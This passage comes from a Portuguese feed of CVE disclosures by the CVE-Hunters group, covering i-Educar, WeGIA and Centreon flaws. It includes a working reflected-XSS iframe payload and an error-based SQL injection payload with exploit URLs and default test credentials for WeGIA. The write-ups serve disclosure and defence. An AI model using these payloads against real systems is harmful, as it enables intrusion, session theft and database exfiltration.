srcset="/p/cve-2026-2015/image_hu_c7c42b10db2b974d.png 480w, /p/cve-2026-2015/image_hu_6d3b4c2322653ac2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="470" data-flex-basis="1129px" /></p> <p><img src="/p/cve-2026-2015/image-1.png" width="1545" height="529" srcset="/p/cve-2026-2015/image-1_hu_6d735bdfad336652.png 480w, /p/cve-2026-2015/image-1_hu_a4d2bd6942b71675.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="292" data-flex-basis="700px" /></p> <h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;">O atacante navega até a ferramenta de Importação de Status Final. Ao fazer o upload do CSV, ele aciona o serviço vulnerável. O backend processa os IDs sem validar a propriedade institucional.</p> <p><img src="/p/cve-2026-2015/image-2.png" width="1006" height="679" srcset="/p/cve-2026-2015/image-2_hu_e7355ace98b61b4b.png 480w, /p/cve-2026-2015/image-2_hu_12ff1c22bcc7bc72.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="148" data-flex-basis="355px" /></p> <p style="text-align: justify;">A ferramenta reporta sucesso para todos os registros. Uma verificação no perfil do aluno alvo (da unidade não autorizada) confirma que o status foi alterado. Vários alunos foram afetados, comprovando a capacidade de sabotagem em massa. <p><img src="/p/cve-2026-2015/image-3.png" width="1545" height="858" srcset="/p/cve-2026-2015/image-3_hu_be60c479f60e4c9d.png 480w, /p/cve-2026-2015/image-3_hu_32d0a507a865efc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="180" data-flex-basis="432px" /></p> <p><img src="/p/cve-2026-2015/image-4.png" width="1548" height="863" srcset="/p/cve-2026-2015/image-4_hu_b90d49652e2eba69.png 480w, /p/cve-2026-2015/image-4_hu_d09d377b734095d7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="179" data-flex-basis="430px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta é uma vulnerabilidade de Autorização em Nível de Função Quebrada (BFLA), conforme categorizado pelo OWASP API Security Top 10 (2023) - API4. As consequências incluem: <ul> <li>Adulteração de dados acadêmicos sem autorização.</li> <li>Perda da integridade dos dados em registros escolares.</li> <li>Potencial dano legal e à reputação de instituições de ensino.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/ViniCastro2001/Security_Reports/blob/main/i-educar/BFLA-Final-Status-Import/README.md" target="_blank" rel="noopener" >https://github.com/ViniCastro2001/Security_Reports/blob/main/i-educar/BFLA-Final-Status-Import/README.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/viniciusCastro50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" >Vinicius Castro</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 06 Feb 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2026-23722/ https://www.cvehunters.com/pt/p/cve-2026-23722/ <h2 id="cve-2026-23722-cross-site-scripting-xss-reflected-permite-a-execução-de-código-arbitrário-e-a-alteração-da-interface-do-usuário">CVE-2026-23722: Cross-Site Scripting (XSS) Reflected permite a execução de código arbitrário e a alteração da interface do usuário. </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-23722" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-23722</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi descoberta no sistema WeGIA, especificamente no arquivo <code>html/memorando/insere_despacho.php</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>/html/memorando/insere_despacho.php</code></p> <p>Parâmetro: <code>id_memorando</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"></</span><span class="nt">script</span><span class="p">><</span><span class="nt">iframe</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://js-dos.com/games/doom.exe.html"</span> <span class="na">style</span><span class="o">=</span><span class="s">"position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"</span><span class="p">></</span><span class="nt">iframe</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-url">Exemplo de URL: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20to p% 3A0% 3B% 20esquerda%3A0%3B%20inferior%3A0%3B%20direita%3A0%3B%20largura%3A100%25%3B%20altura%3A100%25%3B%20borda%3A nenhum% 3B% 20margem% 3A0% 3B% 20preenchimento% 3A0%3B% 20overflow% 3Ahidden% 3B% 20z-index% 3A999999% 3B% 22% 3E% 3C% 2Fiframe% 3E </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir </h3><p style="text-align: justify;"> <ul> <li>O payload sai do contexto existente (provavelmente uma atribuição de variável JavaScript) usando a tag <code>script</code> e injeta um iframe externo que cobre toda a área visível.</li> </ul> </p><h2 id="cve-2026-23722-cross-site-scripting-xss-reflected-permite-a-execução-de-código-arbitrário-e-a-alteração-da-interface-do-usuário">CVE-2026-23722: Cross-Site Scripting (XSS) Reflected permite a execução de código arbitrário e a alteração da interface do usuário. </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-23722" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-23722</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi descoberta no sistema WeGIA, especificamente no arquivo <code>html/memorando/insere_despacho.php</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>/html/memorando/insere_despacho.php</code></p> <p>Parâmetro: <code>id_memorando</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"></</span><span class="nt">script</span><span class="p">><</span><span class="nt">iframe</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://js-dos.com/games/doom.exe.html"</span> <span class="na">style</span><span class="o">=</span><span class="s">"position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"</span><span class="p">></</span><span class="nt">iframe</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-url">Exemplo de URL: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20to p% 3A0% 3B% 20esquerda%3A0%3B%20inferior%3A0%3B%20direita%3A0%3B%20largura%3A100%25%3B%20altura%3A100%25%3B%20borda%3A nenhum% 3B% 20margem% 3A0% 3B% 20preenchimento% 3A0%3B% 20overflow% 3Ahidden% 3B% 20z-index% 3A999999% 3B% 22% 3E% 3C% 2Fiframe% 3E </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir </h3><p style="text-align: justify;"> <ul> <li>O payload sai do contexto existente (provavelmente uma atribuição de variável JavaScript) usando a tag <code>script</code> e injeta um iframe externo que cobre toda a área visível.</li> </ul> </p> <p><img src="/p/cve-2026-23722/image.png" width="1919" height="875" srcset="/p/cve-2026-23722/image_hu_bd7167f4b849a834.png 480w, /p/cve-2026-23722/image_hu_f207a24f416f7704.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="219" data-flex-basis="526px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/marcos-tolosa/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcos50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/marcos-tolosa/" target="_blank" rel="noopener" >Marcos Tolosa</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 16 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2026-23723/ https://www.cvehunters.com/pt/p/cve-2026-23723/ <h2 id="cve-2026-23723-vulnerabilidade-de-injeção-sql-error-based-no-parâmetro-id_memorando-do-endpoint-atendido_ocorrenciacontrole">CVE-2026-23723: Vulnerabilidade de Injeção SQL (Error-Based) no parâmetro <code>id_memorando</code> do Endpoint <code>Atendido_ocorrenciaControle</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-23723" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-23723</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL autenticada foi identificada no endpoint <code>Atendido_ocorrenciaControle</code> através do parâmetro <code>id_memorando</code>. Essa falha permite a exfiltração completa do banco de dados, a exposição de informações pessoais sensíveis e a leitura arbitrária de arquivos em ambientes mal configurados.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>Atendido_ocorrenciaControle</code></p> <p>Parâmetro: <code>id_memorando</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">1 AND extractvalue(1, concat(0x7e, @@Version)) </span></span></code></pre></td></tr></table> </div> </div><h4 id="url-de-exemplo">URL de exemplo: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle<span class="err">&</span>metodo=listarTodosComAnexo<span class="err">&</span>id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version)) </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"> <ul> <li>Faça login no sistema WeGIA (usuário: admin, senha: wegia) e obtenha um cookie de sessão válido.</li> <li>A vulnerabilidade foi confirmada no servidor oficial de testes de segurança: <code>sec.wegia.org:8000</code>.</li> <li>Envie uma solicitação GET para o endpoint vulnerável com o seguinte payload:</li> </ul> </p><h2 id="cve-2026-23723-vulnerabilidade-de-injeção-sql-error-based-no-parâmetro-id_memorando-do-endpoint-atendido_ocorrenciacontrole">CVE-2026-23723: Vulnerabilidade de Injeção SQL (Error-Based) no parâmetro <code>id_memorando</code> do Endpoint <code>Atendido_ocorrenciaControle</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-23723" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-23723</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL autenticada foi identificada no endpoint <code>Atendido_ocorrenciaControle</code> através do parâmetro <code>id_memorando</code>. Essa falha permite a exfiltração completa do banco de dados, a exposição de informações pessoais sensíveis e a leitura arbitrária de arquivos em ambientes mal configurados.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>Atendido_ocorrenciaControle</code></p> <p>Parâmetro: <code>id_memorando</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">1 AND extractvalue(1, concat(0x7e, @@Version)) </span></span></code></pre></td></tr></table> </div> </div><h4 id="url-de-exemplo">URL de exemplo: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle<span class="err">&</span>metodo=listarTodosComAnexo<span class="err">&</span>id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version)) </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"> <ul> <li>Faça login no sistema WeGIA (usuário: admin, senha: wegia) e obtenha um cookie de sessão válido.</li> <li>A vulnerabilidade foi confirmada no servidor oficial de testes de segurança: <code>sec.wegia.org:8000</code>.</li> <li>Envie uma solicitação GET para o endpoint vulnerável com o seguinte payload:</li> </ul> </p> <p><img src="/p/cve-2026-23723/image.png" width="1481" height="573" srcset="/p/cve-2026-23723/image_hu_50c6c393ec22c46a.png 480w, /p/cve-2026-23723/image_hu_ea035905a73cb2a0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="258" data-flex-basis="620px" /></p> <p style="text-align: justify;"> <ul> <li>Observe que o sistema retorna uma mensagem de erro, confirmando a injeção:</li> </ul> </p> <p><img src="/p/cve-2026-23723/image-1.png" width="681" height="32" srcset="/p/cve-2026-23723/image-1_hu_61812a024882cb4a.png 480w, /p/cve-2026-23723/image-1_hu_4211dac53e8c18cb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="2128" data-flex-basis="5107px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados sensíveis (por exemplo, usuários, senhas, logs).</li> <li>Enumeração do banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalação para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se combinado com outras vulnerabilidades.</li> <li>Este problema afeta todos os usuários e ambientes, pois não requer autenticação e é acessível por meio de um endpoint público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/viniciusCastro50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" >Vinicius Castro</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 16 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-12511/ https://www.cvehunters.com/pt/p/cve-2025-12511/ <h2 id="cve-2025-12511-cross-site-scripting-xss-armazenado">CVE-2025-12511: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12511" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12511</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração de extensões da administração do DSM.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p><h2 id="cve-2025-12511-cross-site-scripting-xss-armazenado">CVE-2025-12511: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12511" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12511</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração de extensões da administração do DSM.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-12513/ https://www.cvehunters.com/pt/p/cve-2025-12513/ <h2 id="cve-2025-12513-cross-site-scripting-xss-armazenado">CVE-2025-12513: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12513" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12513</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de parâmetros de configuração do Host.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p><h2 id="cve-2025-12513-cross-site-scripting-xss-armazenado">CVE-2025-12513: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12513" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12513</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de parâmetros de configuração do Host.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-12519/ https://www.cvehunters.com/pt/p/cve-2025-12519/ <h2 id="cve-2025-12519-controle-de-acesso-quebrado">CVE-2025-12519: Controle de Acesso Quebrado </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12519" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12519</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Divulgação de informações sobre o endpoint da API de parâmetros de administração.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p><h2 id="cve-2025-12519-controle-de-acesso-quebrado">CVE-2025-12519: Controle de Acesso Quebrado </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12519" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12519</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Divulgação de informações sobre o endpoint da API de parâmetros de administração.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-13056/ https://www.cvehunters.com/pt/p/cve-2025-13056/ <h2 id="cve-2025-13056-cross-site-scripting-xss-armazenado">CVE-2025-13056: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-13056" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-13056</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração dos Menus de ACL de Administração.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p><h2 id="cve-2025-13056-cross-site-scripting-xss-armazenado">CVE-2025-13056: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-13056" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-13056</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração dos Menus de ACL de Administração.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-15026/ https://www.cvehunters.com/pt/p/cve-2025-15026/ <h2 